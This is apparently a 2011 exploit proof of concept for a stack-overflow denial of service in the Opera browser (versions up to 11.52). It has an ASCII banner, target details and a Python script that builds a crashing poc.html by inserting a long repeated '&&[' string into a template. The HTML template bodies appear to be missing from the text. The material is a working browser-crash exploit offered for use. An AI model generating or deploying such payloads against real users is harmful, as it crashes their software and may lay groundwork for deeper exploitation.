## _ (`-') _ (`-') (`-') _ _ ## ## \-.(OO ) (_) .-> ( OO).-> (OO ).-/ (_) <-. ## ## _.' \ ,-(`-') ,---(`-')/ '._ / ,---. ,-(`-'),--. ) .----. .----. ## ##(_...--'' | ( OO)' .-(OO )|'--...__)| \ /`.\ | ( OO)| (`-')\_,-. |\_.-, | ## ##| |_.' | | | )| | .-, \`--. .--''-'|_.' | | | )| |OO ) .' .' |_ < ## ##| .___.'(| |_/ | | '.(_/ | | (| .-. |(| |_/(| '__ | .' /_ .-. \ | ## ##| | | |'->| '-' | | | | | | | | |'->| |'| |\ `-' / ## ##`--' `--' `-----' `--' `--' `--' `--' `-----' `------' `---'' ## ################################################################################### ################################################################################### October 19, 2011 Opera Denial of Service PoC (Stack Overflow) Testsystem: WinXP SP3, Win7(64 bit) Opera version: 11.? <= 11.52 #################################################################################### poc.html:
#################################################################################### Python script 4 debugging (U will need this): #!/usr/bin/python content = open('template.html', 'r').read() filename = 'poc.html' pattern = 'HelloMrStack!' buff = '%/' + pattern + '&&[' * 10000 rc = 1041 content2 = content[:rc] + buff + content[rc:] FILE = open(filename,"w") FILE.write(content2) FILE.close() print "\nLet it crash baby!\n" #################################################################################### template.html: